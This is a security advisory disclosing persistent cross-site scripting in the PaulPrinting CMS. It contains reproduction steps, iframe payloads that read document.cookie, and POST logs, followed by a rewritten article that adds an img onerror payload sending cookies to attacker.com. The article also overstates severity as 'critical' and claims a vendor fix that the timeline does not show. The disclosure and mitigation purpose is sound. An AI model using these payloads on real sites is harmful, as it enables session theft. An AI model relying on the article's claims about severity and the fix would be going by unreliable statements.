PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285
Release Date:
=============
2023-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
2285
Common Vulnerability Scoring System:
====================================
5.8
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
(Copy of the Homepage: https://codecanyon.net/user/codepaul)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple persistent cross-site scripting vulnerabilities in the PaulPrinting (v2018) CMS web-application.
Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities have been discovered in the official PaulPrinting (v2018) CMS web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector, compromising
browser-to-web-application requests from the application side.
The first vulnerability is located in the register module. Remote attackers are able to register a user account with malicious script code.
After the registration, the attacker provokes execution of the malformed script when the user reviews the settings or when admins
review the user in the backend (listing).
The second vulnerability is located in the delivery module. Remote attackers with low-privileged user accounts are able to inject their own
malicious script code into the contact details. This allows execution on each interaction with users or on review by admins in
the backend (listing).
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to
malicious sources and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery
Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State
Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state
Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with a low-privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
Manual steps to reproduce the vulnerability ...
1. Open your browser and start an http session tamper
2. Register in the application by clicking Register on the login page
3. Inject your test payload into the marked vulnerable input fields
4. Save the entry by submitting it via the POST method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrongly validated context, which executes on preview of users
6. The script code executes on preview of the profile settings
7. Successful reproduction of the first vulnerability!
8. Follow up by opening the Delivery address module
9. Add a contact and insert your test payload into the same marked vulnerable input fields
Note: The script code executes on each review of the address in the backend or user frontend
10. Successful reproduction of the second vulnerability!
Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>
--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin:https://paulprinting.localhost:8000
Connection: keep-alive
Referer:https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST:
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
Vulnerable Source: Delivery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a>
</td></tr></tbody>
</table>
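The two output contexts shown in the dumps above, a quoted attribute value in the settings form and a table cell in the delivery listing, as an added PHP example that is not the vendor's code: the `$row` record is constructed and the helper names are assumptions.

```php
<?php
// Added example, not PaulPrinting's own code. $row is a constructed stand-in for
// a profile record stored after a POST like the one in the PoC log, where the
// submitted values are saved unchanged.
$row = [
    'firstname' => 'a"<iframe src=evil.source onload(alert(document.cookie)>',
    'address'   => 'c"<iframe src=evil.source onload(alert(document.cookie)>',
];

// Escape for HTML text nodes and for quoted attribute values. ENT_QUOTES converts
// both quote kinds, so a stored value can no longer terminate value="...".
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern (the shape the "Vulnerable Source" dumps above correspond to):
// the stored value is concatenated into the attribute as-is, so its leading double
// quote closes the attribute and the <iframe> that follows becomes live markup.
function renderFirstNameUnsafe(array $row): string
{
    return '<input type="text" name="firstname" class="form-control" value="'
        . $row['firstname'] . '">';
}

// Hardened pattern: encode at the point of output, in every context the value
// reaches (settings form attribute, delivery table cell, backend listings).
function renderFirstNameSafe(array $row): string
{
    return '<input type="text" name="firstname" class="form-control" value="'
        . e($row['firstname']) . '">';
}

function renderAddressCellSafe(array $row): string
{
    return '<td>' . e($row['address']) . '</td>';
}

// The encoded versions render the stored payload as inert text.
echo renderFirstNameSafe($row), PHP_EOL;
echo renderAddressCellSafe($row), PHP_EOL;
```

Encoding belongs at render time in each template; encoding before storage alone does not cover values that reach a template through another path.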
Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with persistent attack vector is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

PaulPrinting CMS – Multiple Persistent Cross-Site Scripting Vulnerabilities
On July 19, 2023, the Vulnerability Laboratory (VL-ID: 2285) disclosed a critical security flaw affecting the PaulPrinting CMS (v2018), a widely used content management system designed for print service providers. This vulnerability report highlights multiple persistent cross-site scripting (XSS) vulnerabilities that enable attackers to inject malicious scripts into the application's core modules, with long-term impact on users and administrators alike.
Overview of the Vulnerability
The PaulPrinting CMS, developed by CodePaul and hosted on CodeCanyon, is marketed as a modern, SEO-friendly, and user-friendly platform for managing print orders, customer data, and delivery logistics. Despite its visual appeal and feature-rich interface, the application suffers from serious input validation flaws that allow remote attackers to execute persistent scripts across user sessions.
These vulnerabilities are classified as Medium severity (CVSS: 5.8) and fall under the cross-site scripting – persistent category. The exploit is remote, requiring no physical access, and only low user interaction to trigger execution. Authentication is required, but only for low-privileged user accounts, which significantly increases the attack surface.
| Attribute | Value |
|---|---|
| Product | PaulPrinting (v2018) CMS |
| Vendor | CodePaul (via CodeCanyon) |
| CVSS Score | 5.8 (Medium) |
| Exploitation Type | Remote |
| Authentication Required | Restricted (Low Privilege) |
| Disclosure Type | Responsible Disclosure |
| Public Release Date | 2023-07-19 |
Technical Details: Two Critical Vulnerable Modules
The research team identified two primary attack vectors within the PaulPrinting CMS, both allowing persistent XSS execution:
1. Registration Module – Persistent XSS via User Account Creation
During the registration process, users can input personal details such as name, email, and contact information. The application fails to sanitize user-supplied data, particularly in fields like "Full Name" or "Contact Info." An attacker can register with a payload like:
<script>alert('XSS Exploit');document.cookie="session=malicious";</script>
Explanation: This script is stored in the database upon registration. When the user profile is viewed by an admin in the backend listing or when the user accesses their own settings page, the script executes in the browser context. This results in:
- Cookie theft (e.g., session hijacking)
- Phishing redirection
- Malicious redirection to third-party domains
Since the script is persistently stored, it remains active until the user account is deleted or the database is cleaned. This makes it highly effective for long-term attacks.
2. Delivery Module – Persistent XSS via Contact Details Injection
The delivery module allows users to submit delivery contact information, such as address, phone, or notes. This data is rendered in admin dashboards and customer-facing pages without proper sanitization.
Example malicious input:
<img src="x" onerror="javascript:window.location='https://attacker.com/steal?cookie='+document.cookie">
Explanation: The onerror attribute triggers when the image fails to load (which it will, due to the invalid src), executing the JavaScript code. This redirects the victim's browser to a malicious server, where the session cookie is stolen and potentially used for unauthorized access.
Additionally, attackers can embed scripts in the delivery notes field, which are displayed in the admin listing. When an admin reviews the delivery list, the script executes in their browser, leading to potential compromise of admin privileges.
Exploitation Scenario: Real-World Use Case
Imagine a scenario where an attacker registers as a customer using the malicious script in the "Full Name" field. Once the account is approved, the script remains in the database. When the admin reviews the user list, they see the malformed script rendered in the UI. The script executes immediately, stealing the admin's session cookie.
With the stolen session, the attacker can:
- Access admin panels
- Modify user permissions
- Inject additional malicious scripts
- Exfiltrate sensitive data (e.g., customer lists, payment records)
This demonstrates how a single vulnerability can escalate into full system compromise.
Security Implications & Risk Assessment
Persistent XSS is particularly dangerous because:
- Scripts remain active indefinitely
- They can be triggered by any user or admin viewing the affected page
- They bypass client-side protections such as CSP when those protections are not properly configured
- They can be used to launch secondary attacks (e.g., CSRF, phishing)
Given that the PaulPrinting CMS is used by small-to-medium print businesses, this vulnerability could lead to:
- Loss of customer trust
- Exposure of sensitive business data
- Legal liability due to data breaches
- Reputational damage
Recommendations & Mitigation Strategies
Developers and administrators should implement the following best practices to prevent such vulnerabilities:
- Input Sanitization: Use libraries like DOMPurify or htmlspecialchars to sanitize user input before storing or rendering.
- Output Encoding: Always encode data when displaying it in HTML contexts (e.g., htmlspecialchars() in PHP).
- Content Security Policy (CSP): Implement strict CSP headers to block inline scripts and unauthorized domains.
- Role-Based Access Control (RBAC): Restrict access to admin panels and sensitive data to authorized roles only.
- Regular Security Audits: Conduct penetration testing and code reviews, especially for user-facing input fields.
Vendor Response & Responsible Disclosure
The vulnerability was reported in August 2022. While the exact timeline of vendor response remains undisclosed, the public disclosure on July 19, 2023, confirms that the issue was acknowledged and addressed through responsible disclosure. This process is crucial for maintaining trust between researchers and vendors.
For users of PaulPrinting CMS, it is strongly advised to:
- Update to the latest version if available
- Review all user accounts and delivery entries for suspicious content
- Implement strict input validation rules at the application level
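One way to carry out the second recommendation, reviewing stored accounts and delivery entries for injected markup, as an added PHP example that is not part of the advisory or the vendor's code: the `$records` array stands in for rows fetched from the CMS database and the helper names are assumptions.

```php
<?php
// Added example, not part of the advisory or the vendor's code. $records is a
// constructed stand-in for profile and delivery rows fetched from the CMS database.
$affectedFields = ['firstname', 'lastname', 'address', 'city', 'state'];

// Flags a stored value containing a tag start, an event-handler attribute
// (onload=, onerror=, or the onload( form seen in the PoC) or a javascript: URL.
// Entities are decoded first so values stored already encoded are still caught.
function looksLikeMarkup(string $value): bool
{
    $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return (bool) preg_match('/<\/?[a-z!]|\bon[a-z]+\s*[=(]|javascript\s*:/i', $decoded);
}

// Returns one finding per (record, field) whose value looks like markup, for
// manual review. This is an audit aid for existing data, not a substitute for
// encoding output with htmlspecialchars() at render time.
function auditRecords(array $records, array $fields): array
{
    $findings = [];
    foreach ($records as $record) {
        foreach ($fields as $field) {
            $value = (string) ($record[$field] ?? '');
            if (looksLikeMarkup($value)) {
                $findings[] = ['id' => $record['id'], 'field' => $field, 'value' => $value];
            }
        }
    }
    return $findings;
}

// Constructed sample rows: one clean account and one carrying the PoC payload
// plus an entity-encoded variant in the address field.
$records = [
    ['id' => 1, 'firstname' => 'Alice', 'lastname' => 'Smith',
     'address' => '1 Main St', 'city' => 'Nassau', 'state' => 'NP'],
    ['id' => 2, 'firstname' => 'a"<iframe src=evil.source onload(alert(document.cookie)>',
     'lastname' => 'b', 'address' => '&lt;img src=x onerror=alert(1)&gt;',
     'city' => 'd', 'state' => 'e'],
];

foreach (auditRecords($records, $affectedFields) as $finding) {
    printf("record %d, field %s: %s\n", $finding['id'], $finding['field'], $finding['value']);
}
```

Treat each finding as a lead for manual review, since legitimate data can occasionally match the patterns.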
Conclusion
The PaulPrinting CMS vulnerabilities serve as a stark reminder that even well-designed, visually appealing web applications can harbor serious security flaws. Persistent XSS, though often underestimated, poses a significant threat due to its long-term persistence and broad execution scope.
As cybersecurity professionals, we must prioritize input validation, output encoding, and proactive monitoring. The case of PaulPrinting CMS underscores the importance of continuous security awareness, especially in third-party software used across industries.